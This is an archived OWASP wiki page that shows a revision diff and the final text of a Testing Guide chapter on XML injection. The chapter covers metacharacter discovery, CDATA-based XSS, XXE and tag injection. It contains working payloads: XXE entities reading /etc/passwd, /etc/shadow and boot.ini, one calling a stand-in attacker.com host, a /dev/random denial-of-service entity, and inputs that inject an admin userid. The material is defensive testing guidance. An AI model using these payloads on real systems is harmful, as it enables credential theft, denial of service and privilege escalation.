This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Testing for XML Injection (OTG-INPVAL-008)"

From OWASP
Jump to: navigation, search
(Discovery)
(this tool no longer exists)
 
(38 intermediate revisions by 10 users not shown)
Line 1: Line 1:
[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br>
+
{{Template:OWASP Testing Guide v4}}
{{Template:OWASP Testing Guide v2}}
 
  
== Brief Summary ==
+
== Summary ==
<br>
+
XML Injection testing is when a tester tries to inject an XML doc to the application. If the XML parser fails to contextually validate data, then the test will yield a positive result.  
..here: we describe in "natural language" what we want to test.
 
<br>
 
  
== Short Description of the Issue ==
 
...<br>
 
  
== Black Box testing and example ==
+
This section describes practical examples of XML Injection. First, an XML style communication will be defined and its working principles explained. Then, the discovery method in which we try to insert XML metacharacters. Once the first step is accomplished, the tester will have some information about the XML structure, so it will be possible to try to inject XML data and tags (Tag Injection).
Let's suppose there is a web application using an xml style communication  
+
 
in order to perform users registration.
+
 
This is done by creating and adding a new <user> node on an xmlDb file.
+
== How to Test ==
Let's suppose xmlDB file is like the following:
+
Let's suppose there is a web application using an XML style communication in order to perform user registration. This is done by creating and adding a new <user> node in an xmlDb file.
 +
 
 +
 
 +
Let's suppose the xmlDB file is like the following:
  
 
  '''<nowiki><?xml version="1.0" encoding="ISO-8859-1"?>  
 
  '''<nowiki><?xml version="1.0" encoding="ISO-8859-1"?>  
Line 21: Line 19:
 
<username>gandalf</username>  
 
<username>gandalf</username>  
 
<password>!c3</password>  
 
<password>!c3</password>  
<userid>0<userid/>
+
<userid>0</userid>
 
<mail>[email protected]</mail>
 
<mail>[email protected]</mail>
 
</user>  
 
</user>  
Line 27: Line 25:
 
<username>Stefan0</username>  
 
<username>Stefan0</username>  
 
<password>w1s3c</password>  
 
<password>w1s3c</password>  
<userid>500<userid/>
+
<userid>500</userid>
 
<mail>[email protected]</mail>
 
<mail>[email protected]</mail>
 
</user>  
 
</user>  
Line 33: Line 31:
  
  
When a user register himself by filling an html form,  
+
When a user registers himself by filling an HTML form,  
the application will receive user's data in a standard request which
+
the application receives the user's data in a standard request, which,
for the sake of simplicity will be supposed to be sent as GET request.
+
for the sake of simplicity, will be supposed to be sent as a GET request.
  
For example the following values:
+
 
 +
For example, the following values:
  
 
  '''Username: tony'''
 
  '''Username: tony'''
Line 43: Line 42:
 
  '''E-mail: [email protected]'''
 
  '''E-mail: [email protected]'''
  
Will produce the request:
+
will produce the request:
  
 
  <nowiki>http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&[email protected]</nowiki>
 
  <nowiki>http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&[email protected]</nowiki>
  
to the application, which, afterwards, will build the following node:
+
 
 +
The application, then, builds the following node:
  
 
  '''<nowiki><user>  
 
  '''<nowiki><user>  
 
<username>tony</username>  
 
<username>tony</username>  
 
<password>Un6R34kb!e</password>  
 
<password>Un6R34kb!e</password>  
<userid>500<userid/>
+
<userid>500</userid>
 
<mail>[email protected]</mail>
 
<mail>[email protected]</mail>
 
</user></nowiki>'''
 
</user></nowiki>'''
 +
  
 
which will be added to the xmlDB:
 
which will be added to the xmlDB:
Line 63: Line 64:
 
<username>gandalf</username>  
 
<username>gandalf</username>  
 
<password>!c3</password>  
 
<password>!c3</password>  
<userid>0<userid/>
+
<userid>0</userid>
 
<mail>[email protected]</mail>
 
<mail>[email protected]</mail>
 
</user>  
 
</user>  
Line 69: Line 70:
 
<username>Stefan0</username>  
 
<username>Stefan0</username>  
 
<password>w1s3c</password>  
 
<password>w1s3c</password>  
<userid>500<userid/>
+
<userid>500</userid>
 
<mail>[email protected]</mail>
 
<mail>[email protected]</mail>
 
</user>  
 
</user>  
Line 75: Line 76:
 
<username>tony</username>  
 
<username>tony</username>  
 
<password>Un6R34kb!e</password>  
 
<password>Un6R34kb!e</password>  
<userid>500<userid/>
+
<userid>500</userid>
 
<mail>[email protected]</mail>
 
<mail>[email protected]</mail>
 
</user>  
 
</user>  
 
</users></nowiki>'''
 
</users></nowiki>'''
 +
 +
 
=== Discovery ===
 
=== Discovery ===
The first step in order to test an application for the presence of a XML Injection
+
The first step in order to test an application for the presence of a XML Injection vulnerability consists of trying to insert XML metacharacters.
vulnerability, consists in trying to insert xml metacharacters.<br>
+
 
A list of xml metacharacters is:
+
 
* '''Single quote: ' ''' - When not sanitized, this character could throw an exception during xml
+
XML metacharacters are:
parsing if the injected value is going to be part of an attribute value in a tag.
+
* '''Single quote: ' ''' - When not sanitized, this character could throw an exception during XML parsing, if the injected value is going to be part of an attribute value in a tag.
 
As an example, let's suppose there is the following attribute:
 
As an example, let's suppose there is the following attribute:
  
Line 93: Line 96:
 
  '''inputValue = foo''''
 
  '''inputValue = foo''''
  
is instantiated and then is inserted into attrib value:
+
is instantiated and then is inserted as the attrib value:
  
 
  '''<nowiki><node attrib='foo''/></nowiki>'''
 
  '''<nowiki><node attrib='foo''/></nowiki>'''
  
The xml document will be no more well formed.
+
then, the resulting XML document is not well formed.
  
* '''Double quote: " '''- this character has the same means of double quotes and it could be  
+
* '''Double quote: " '''- this character has the same meaning as single quote and it could be used if the attribute value is enclosed in double quotes.
used in case attribute value is enclosed by double quotes.
 
  
 
  '''<nowiki><node attrib="$inputValue"/></nowiki>'''
 
  '''<nowiki><node attrib="$inputValue"/></nowiki>'''
Line 107: Line 109:
 
  '''$inputValue = foo"'''
 
  '''$inputValue = foo"'''
  
the substitution will be:
+
the substitution gives:
  
 
  '''<nowiki><node attrib="foo""/></nowiki>'''
 
  '''<nowiki><node attrib="foo""/></nowiki>'''
  
and the xml document will be no more valid.
+
and the resulting XML document is invalid.
  
* '''Angular parenthesis: > and <''' - By adding an open or closed angular parenthesis  
+
* '''Angular parentheses: > and <''' - By adding an open or closed angular parenthesis in a user input like the following:
in a user input like the following:
 
  
 
  '''Username = foo<'''
 
  '''Username = foo<'''
  
the application wil build a new node:
+
the application will build a new node:
  
 
  '''<nowiki><user>  
 
  '''<nowiki><user>  
Line 127: Line 128:
 
</user></nowiki>'''
 
</user></nowiki>'''
  
but the presence of an open '<' will deny the validation of xml data.
+
but, because of the presence of the open '<', the resulting XML document is invalid.
  
  
* '''Comment tag: <nowiki><!--/--></nowiki>''' -  This sequence of characters is interpreted as the beginning/
+
* '''Comment tag: <nowiki><!--/--></nowiki>''' -  This sequence of characters is interpreted as the beginning/end of a comment. So by injecting one of them in Username parameter:
end of a comment. So by injecting one of them in Username parameter:
 
  
 
  '''<nowiki>Username = foo<!--</nowiki>'''
 
  '''<nowiki>Username = foo<!--</nowiki>'''
  
the application wil build a node like the following:
+
the application will build a node like the following:
  
 
  '''<nowiki><user>  
 
  '''<nowiki><user>  
Line 144: Line 144:
 
</user></nowiki>'''
 
</user></nowiki>'''
  
which won't be a valid xml sequence.
+
which won't be a valid XML sequence.
  
* '''Ampersand: &amp; '''-  The ampersand is used in xml syntax to represent XML Entities.
+
* '''Ampersand: &amp; '''-  The ampersand is used in the XML syntax to represent entities. The format of an entity is '&amp;symbol;'. An entity is mapped to a character in the Unicode character set.
that is, by using an arbitrary entity like '&amp;symbol;' it is possible to  
 
map it with a character or a string which will be considered as non-xml text.
 
  
 
For example:
 
For example:
Line 154: Line 152:
 
  '''<nowiki><tagnode>&amp;lt;</tagnode></nowiki>'''
 
  '''<nowiki><tagnode>&amp;lt;</tagnode></nowiki>'''
  
is well formed and valid, and represent the '<' ASCII character.
+
is well formed and valid, and represents the '<' ASCII character.
  
If '&amp;' is not encoded itself with &amp;amp; it could be used to test XML injection.
+
If '&amp;' is not encoded itself with &amp;amp;, it could be used to test XML injection.
  
Infact if a input like the following is provided:
+
In fact, if an input like the following is provided:
  
 
  '''Username = &amp;foo'''
 
  '''Username = &amp;foo'''
Line 171: Line 169:
 
</user></nowiki>'''
 
</user></nowiki>'''
  
 
+
but, again, the document is not valid: &amp;foo is not terminated with ';' and the &foo; entity is undefined.
but as &amp;foo doesn't has a final ';' and moreover &foo; entity is defined nowhere so xml is not valid as well.
 
  
  
* '''CDATA begin/end tags: <![CDATA[ / ]]>''' - When CDATA tag is used, every character enclosed by it is not parsed by xml parser.
+
* '''CDATA section delimiters: <![CDATA[ / ]]>''' - CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.
Often this is used when there are metacharacters inside a text node
 
which are to be considered as text values.
 
  
For example if there is the need to represent the string '<foo>' inside a text node
+
For example, if there is the need to represent the string '<foo>' inside a text node, a CDATA section may be used:
it could be used CDATA in the following way:
 
  
 
  '''<nowiki><node>
 
  '''<nowiki><node>
Line 186: Line 180:
 
</node></nowiki>'''
 
</node></nowiki>'''
  
so that '<foo>' won't be parsed and will be considered as a text value.
+
so that '<foo>' won't be parsed as markup and will be considered as character data.
  
In case  a node is built in the following way:
+
If a node is built in the following way:
  
 
  '''<nowiki><username><![CDATA[<$userName]]></username></nowiki>'''
 
  '''<nowiki><username><![CDATA[<$userName]]></username></nowiki>'''
  
the tester could try to inject the end CDATA sequence ']]>' in order to try to invalidate xml.
+
the tester could try to inject the end CDATA string ']]>' in order to try to invalidate the XML document.
  
 
  '''userName  = ]]>'''
 
  '''userName  = ]]>'''
Line 200: Line 194:
 
  '''<username><![CDATA[]]>]]></username>'''
 
  '''<username><![CDATA[]]>]]></username>'''
  
which is not a valid xml representation.
+
which is not a valid XML fragment.
  
* '''External Entity: '''
 
Another test is related to CDATA tag. When the XML document will be parsed, the CDATA value will be eliminated, so it is possible to add a script if the tag
 
  
contents will be showed in the HTML page.
+
Another test is related to CDATA tag. Suppose that the XML document is processed to generate an HTML page. In this case, the CDATA section delimiters may be simply eliminated, without further inspecting their contents. Then, it is possible to inject HTML tags, which will be included in the generated page, completely bypassing existing sanitization routines.
Suppose to have a node containing text that will be displayed at the user. If this text could be modified, as the following:
+
 
 +
 
 +
Let's consider a concrete example. Suppose we have a node containing some text that will be displayed back to the user.  
  
 
  '''<nowiki> <html>
 
  '''<nowiki> <html>
Line 212: Line 206:
 
  </html></nowiki>'''
 
  </html></nowiki>'''
  
it is possible to avoid input filter by insert an HTML text that uses CDATA tag. For example inserting the following value:
+
Then, an attacker can provide the following input:
  
 
  '''<nowiki>$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></nowiki>'''
 
  '''<nowiki>$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></nowiki>'''
  
we will obtain the following node:
+
and obtain the following node:
  
 
  '''<nowiki><html>
 
  '''<nowiki><html>
Line 222: Line 216:
 
  </html></nowiki>'''
 
  </html></nowiki>'''
  
that in analysis phase will eliminate the DCATA tag and will insert the following value in the HTML:
+
During the processing, the CDATA section delimiters are eliminated, generating the following HTML code:
  
 
  '''<script>alert('XSS')</script>'''
 
  '''<script>alert('XSS')</script>'''
  
In this case the application will be exposed at a XSS vulnerability. So we can insert some code inside the CDATA tag to avoid the input validation filter.
+
The result is that the application is vulnerable to XSS.
 +
 
 +
 
 +
'''External Entity:'''
 +
The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.  
 +
 
  
'''Entity:'''
+
To test for XXE vulnerabilities, one can use the following input:
It's possible to define an entity using the DTDs. Entity-name as ''&amp;.'' is an example of entity. It's possible to specify a URL as entity: in this way you create a possible vulnerability by XML External Entity (XEE). So, the last test to try is formed by the following strings:
 
  
 
  '''<nowiki><?xml version="1.0" encoding="ISO-8859-1"?>
 
  '''<nowiki><?xml version="1.0" encoding="ISO-8859-1"?>
Line 236: Line 234:
 
   <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo></nowiki>'''
 
   <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo></nowiki>'''
  
This test could crash the web server (linux system), because we are trying to create an entity with a infinite number of chars.
+
 
Other tests are the following:
+
This test could crash the web server (on a UNIX system), if the XML parser attempts to substitute the entity with the contents of the /dev/random file.
 +
 
 +
 
 +
Other useful tests are the following:
  
 
  '''<nowiki>
 
  '''<nowiki>
Line 260: Line 261:
 
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo></nowiki>'''
 
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo></nowiki>'''
  
The goal of these tests is to obtain informations about the structure of the XML data base. If we analyze these errors We can find a lot of useful informations in relation to the adopted technology.
 
  
 
=== Tag Injection ===
 
=== Tag Injection ===
  
Once the first step is accomplished, the tester will have  
+
Once the first step is accomplished, the tester will have some information about the structure of the XML document. Then, it is possible to try to inject XML data and tags. We will show an example of how this can lead to a privilege escalation attack.
some informations about xml structure, so it will be possible to  
 
try to inject xml data and tags.
 
  
Considering previous example, by inserting the following values::
+
 
 +
Let's considering the previous application. By inserting the following values:
  
 
  '''Username: tony'''
 
  '''Username: tony'''
Line 298: Line 297:
 
</users></nowiki>'''
 
</users></nowiki>'''
  
The resulting xml file will be well formed and it is likely that the userid tag  
+
 
will be cosidered with the latter value (0 = admin id).
+
The resulting XML file is well formed. Furthermore, it is likely that, for the user tony, the value associated with the userid tag is the one appearing last, i.e., 0 (the admin ID). In other words, we have injected a user with administrative privileges.
The only shortcoming is that userid tag exists two times in the last user node, and
+
 
often xml file is associated with a schema or a dtd.
+
 
Let's suppose now that xml structure has the following DTD:
+
The only problem is that the userid tag appears twice in the last user node. Often, XML documents are associated with a schema or a DTD and will be rejected if they don't comply with it.
 +
 
 +
 
 +
Let's suppose that the XML document is specified by the following DTD:
  
 
  '''<nowiki><!DOCTYPE users [
 
  '''<nowiki><!DOCTYPE users [
Line 313: Line 315:
 
]></nowiki>'''
 
]></nowiki>'''
  
to be noted that userid node is defined with cardinality 1 (userid).
 
  
So if this occurs, any simple attack won't be accomplished when xml is validated against the
+
Note that the userid node is defined with cardinality 1. In this case, the attack we have shown before (and other simple attacks) will not work, if the XML document is validated against its DTD before any processing occurs.
specified DTD.
 
  
If the tester can control some value for nodes enclosing userid tag (like in this example),
+
 
by injection a comment start/end sequence like the following:
+
However, this problem can be solved, if the tester controls the value of some nodes preceding the offending node (userid, in this example). In fact, the tester can comment out such node, by injecting
 +
a comment start/end sequence:
  
  
 
  '''Username: tony'''
 
  '''Username: tony'''
  '''Password: Un6R34kb!e</password><!--'''
+
  '''<nowiki>Password: Un6R34kb!e</password><!--</nowiki>'''
  '''E-mail: --><userid>0</userid><mail>[email protected]'''
+
  '''<nowiki>E-mail: --><userid>0</userid><mail>[email protected]</nowiki>'''
  
xml database file will be :
+
In this case, the final XML database is:
  
 
  '''<nowiki><?xml version="1.0" encoding="ISO-8859-1"?>  
 
  '''<nowiki><?xml version="1.0" encoding="ISO-8859-1"?>  
Line 350: Line 351:
 
</users></nowiki>'''
 
</users></nowiki>'''
  
This way original ''userid'' tag will be commented out and the one injected will be
 
parsed in compliance to DTD rules.<br>
 
The result is that user '' 'tony' '' will be logged with ''userid=0'' ( which could be an administrator uid)
 
  
 +
The original ''userid'' node has been commented out, leaving only the injected one. The document now complies with its DTD rules.<br>
 +
 +
==Source Code Review ==
 +
The following Java API may be vulnerable to XXE if they are not configured properly.
 +
 +
* javax.xml.parsers.DocumentBuilder
 +
* javax.xml.parsers.DocumentBuildFactory
 +
* org.xml.sax.EntityResolver
 +
* org.dom4j.*
 +
* javax.xml.parsers.SAXParser
 +
* javax.xml.parsers.SAXParserFactory
 +
* TransformerFactory
 +
* SAXReader
 +
* DocumentHelper
 +
* SAXBuilder
 +
* SAXParserFactory
 +
* XMLReaderFactory
 +
* XMLInputFactory
 +
* SchemaFactory
 +
* DocumentBuilderFactoryImpl
 +
* SAXTransformerFactory
 +
* DocumentBuilderFactoryImpl
 +
* XMLReader
 +
* Xerces: DOMParser, DOMParserImpl, SAXParser, XMLParser
 +
 +
Check source code if the docType, external DTD, and external parameter entities are set as forbidden uses.
 +
 +
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
 +
 +
In addition, the Java POI office reader may be vulnerable to XXE if the version is under 3.10.1.
 +
 +
The version of POI library can be identified from the file name of the JAR. For example,
 +
* poi-3.8.jar
 +
* poi-ooxml-3.8.jar
 +
 +
The followings source code keyword may apply to C.
 +
 +
* libxml2: xmlCtxtReadMemory,xmlCtxtUseOptions,xmlParseInNodeContext,xmlReadDoc,xmlReadFd,xmlReadFile ,xmlReadIO,xmlReadMemory, xmlCtxtReadDoc ,xmlCtxtReadFd,xmlCtxtReadFile,xmlCtxtReadIO
 +
* libxerces-c: XercesDOMParser, SAXParser, SAX2XMLReader
  
 
== References ==
 
== References ==
 
'''Whitepapers'''<br>
 
'''Whitepapers'''<br>
* [1] Author1, Author2: "Title" - http://www.ietf.org/rfc/rfc2254.txt<br>
+
* [1] Alex Stamos: "Attacking Web Services" - http://www.owasp.org/images/d/d1/AppSec2005DC-Alex_Stamos-Attacking_Web_Services.ppt<br>
* [2]...<br>
+
* Gregory Steuck, "XXE (Xml eXternal Entity) attack", http://www.securityfocus.com/archive/1/297714
 
+
* OWASP XXE Prevention Cheat Sheet https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
'''Tools'''<br>
 
* Author: "Title" - http://www.owasp.org <br>
 
 
 
{{Category:OWASP Testing Project AoC}}
 

Latest revision as of 21:14, 11 September 2017

This article is part of the new OWASP Testing Guide v4.
Back to the OWASP Testing Guide v4 ToC: https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents Back to the OWASP Testing Guide Project: https://www.owasp.org/index.php/OWASP_Testing_Project

Summary

XML Injection testing is when a tester tries to inject an XML doc to the application. If the XML parser fails to contextually validate data, then the test will yield a positive result.


This section describes practical examples of XML Injection. First, an XML style communication will be defined and its working principles explained. Then, the discovery method in which we try to insert XML metacharacters. Once the first step is accomplished, the tester will have some information about the XML structure, so it will be possible to try to inject XML data and tags (Tag Injection).


How to Test

Let's suppose there is a web application using an XML style communication in order to perform user registration. This is done by creating and adding a new <user> node in an xmlDb file.


Let's suppose the xmlDB file is like the following:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
</users>


When a user registers himself by filling an HTML form, the application receives the user's data in a standard request, which, for the sake of simplicity, will be supposed to be sent as a GET request.


For example, the following values:

Username: tony
Password: Un6R34kb!e
E-mail: [email protected]

will produce the request:

http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&[email protected]


The application, then, builds the following node:

<user> 
	<username>tony</username> 
	<password>Un6R34kb!e</password> 
	<userid>500</userid>
	<mail>[email protected]</mail>
</user>


which will be added to the xmlDB:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>tony</username> 
		<password>Un6R34kb!e</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
</users>


Discovery

The first step in order to test an application for the presence of a XML Injection vulnerability consists of trying to insert XML metacharacters.


XML metacharacters are:

  • Single quote: ' - When not sanitized, this character could throw an exception during XML parsing, if the injected value is going to be part of an attribute value in a tag.

As an example, let's suppose there is the following attribute:

<node attrib='$inputValue'/>

So, if:

inputValue = foo'

is instantiated and then is inserted as the attrib value:

<node attrib='foo''/>

then, the resulting XML document is not well formed.

  • Double quote: " - this character has the same meaning as single quote and it could be used if the attribute value is enclosed in double quotes.
<node attrib="$inputValue"/>

So if:

$inputValue = foo"

the substitution gives:

<node attrib="foo""/>

and the resulting XML document is invalid.

  • Angular parentheses: > and < - By adding an open or closed angular parenthesis in a user input like the following:
Username = foo<

the application will build a new node:

<user> 
     <username>foo<</username> 
     <password>Un6R34kb!e</password> 
     <userid>500</userid>
     <mail>[email protected]</mail>
</user>

but, because of the presence of the open '<', the resulting XML document is invalid.


  • Comment tag: <!--/--> - This sequence of characters is interpreted as the beginning/end of a comment. So by injecting one of them in Username parameter:
Username = foo<!--

the application will build a node like the following:

<user> 
    <username>foo<!--</username> 
    <password>Un6R34kb!e</password> 
    <userid>500</userid>
    <mail>[email protected]</mail>
</user>

which won't be a valid XML sequence.

  • Ampersand: & - The ampersand is used in the XML syntax to represent entities. The format of an entity is '&symbol;'. An entity is mapped to a character in the Unicode character set.

For example:

<tagnode>&lt;</tagnode>

is well formed and valid, and represents the '<' ASCII character.

If '&' is not encoded itself with &amp;, it could be used to test XML injection.

In fact, if an input like the following is provided:

Username = &foo

a new node will be created:

<user> 
<username>&foo</username> 
<password>Un6R34kb!e</password> 
<userid>500</userid>
<mail>[email protected]</mail>
</user>

but, again, the document is not valid: &foo is not terminated with ';' and the &foo; entity is undefined.


  • CDATA section delimiters: <![CDATA[ / ]]> - CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.

For example, if there is the need to represent the string '<foo>' inside a text node, a CDATA section may be used:

<node>
    <![CDATA[<foo>]]>
</node>

so that '<foo>' won't be parsed as markup and will be considered as character data.

If a node is built in the following way:

<username><![CDATA[<$userName]]></username>

the tester could try to inject the end CDATA string ']]>' in order to try to invalidate the XML document.

userName  = ]]>

this will become:

<username><![CDATA[]]>]]></username>

which is not a valid XML fragment.


Another test is related to CDATA tag. Suppose that the XML document is processed to generate an HTML page. In this case, the CDATA section delimiters may be simply eliminated, without further inspecting their contents. Then, it is possible to inject HTML tags, which will be included in the generated page, completely bypassing existing sanitization routines.


Let's consider a concrete example. Suppose we have a node containing some text that will be displayed back to the user.

 <html>
 $HTMLCode
 </html>

Then, an attacker can provide the following input:

$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>

and obtain the following node:

<html>
  <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
 </html>

During the processing, the CDATA section delimiters are eliminated, generating the following HTML code:

<script>alert('XSS')</script>

The result is that the application is vulnerable to XSS.


External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.


To test for XXE vulnerabilities, one can use the following input:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>


This test could crash the web server (on a UNIX system), if the XML parser attempts to substitute the entity with the contents of the /dev/random file.


Other useful tests are the following:


 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>


Tag Injection

Once the first step is accomplished, the tester will have some information about the structure of the XML document. Then, it is possible to try to inject XML data and tags. We will show an example of how this can lead to a privilege escalation attack.


Let's considering the previous application. By inserting the following values:

Username: tony
Password: Un6R34kb!e
E-mail: [email protected]</mail><userid>0</userid><mail>[email protected]

the application will build a new node and append it to the XML database:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>tony</username> 
		<password>Un6R34kb!e</password> 
		<userid>500</userid>
		<mail>[email protected]</mail><userid>0</userid><mail>[email protected]</mail>
	</user> 
</users>


The resulting XML file is well formed. Furthermore, it is likely that, for the user tony, the value associated with the userid tag is the one appearing last, i.e., 0 (the admin ID). In other words, we have injected a user with administrative privileges.


The only problem is that the userid tag appears twice in the last user node. Often, XML documents are associated with a schema or a DTD and will be rejected if they don't comply with it.


Let's suppose that the XML document is specified by the following DTD:

<!DOCTYPE users [
	  <!ELEMENT users (user+) >
	  <!ELEMENT user (username,password,userid,mail+) >
	  <!ELEMENT username (#PCDATA) >
	  <!ELEMENT password (#PCDATA) >
	  <!ELEMENT userid (#PCDATA) >
	  <!ELEMENT mail (#PCDATA) >
]>


Note that the userid node is defined with cardinality 1. In this case, the attack we have shown before (and other simple attacks) will not work, if the XML document is validated against its DTD before any processing occurs.


However, this problem can be solved, if the tester controls the value of some nodes preceding the offending node (userid, in this example). In fact, the tester can comment out such node, by injecting a comment start/end sequence:


Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><userid>0</userid><mail>[email protected]

In this case, the final XML database is:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<users> 
	<user> 
		<username>gandalf</username> 
		<password>!c3</password> 
		<userid>0</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>Stefan0</username> 
		<password>w1s3c</password> 
		<userid>500</userid>
		<mail>[email protected]</mail>
	</user> 
	<user> 
		<username>tony</username> 
		<password>Un6R34kb!e</password><!--</password> 
		<userid>500</userid>
		<mail>--><userid>0</userid><mail>[email protected]</mail>
	</user>
</users>


The original userid node has been commented out, leaving only the injected one. The document now complies with its DTD rules.

Source Code Review

The following Java API may be vulnerable to XXE if they are not configured properly.

  • javax.xml.parsers.DocumentBuilder
  • javax.xml.parsers.DocumentBuildFactory
  • org.xml.sax.EntityResolver
  • org.dom4j.*
  • javax.xml.parsers.SAXParser
  • javax.xml.parsers.SAXParserFactory
  • TransformerFactory
  • SAXReader
  • DocumentHelper
  • SAXBuilder
  • SAXParserFactory
  • XMLReaderFactory
  • XMLInputFactory
  • SchemaFactory
  • DocumentBuilderFactoryImpl
  • SAXTransformerFactory
  • DocumentBuilderFactoryImpl
  • XMLReader
  • Xerces: DOMParser, DOMParserImpl, SAXParser, XMLParser

Check source code if the docType, external DTD, and external parameter entities are set as forbidden uses.

In addition, the Java POI office reader may be vulnerable to XXE if the version is under 3.10.1.

The version of POI library can be identified from the file name of the JAR. For example,

  • poi-3.8.jar
  • poi-ooxml-3.8.jar

The followings source code keyword may apply to C.

  • libxml2: xmlCtxtReadMemory,xmlCtxtUseOptions,xmlParseInNodeContext,xmlReadDoc,xmlReadFd,xmlReadFile ,xmlReadIO,xmlReadMemory, xmlCtxtReadDoc ,xmlCtxtReadFd,xmlCtxtReadFile,xmlCtxtReadIO
  • libxerces-c: XercesDOMParser, SAXParser, SAX2XMLReader

References

Whitepapers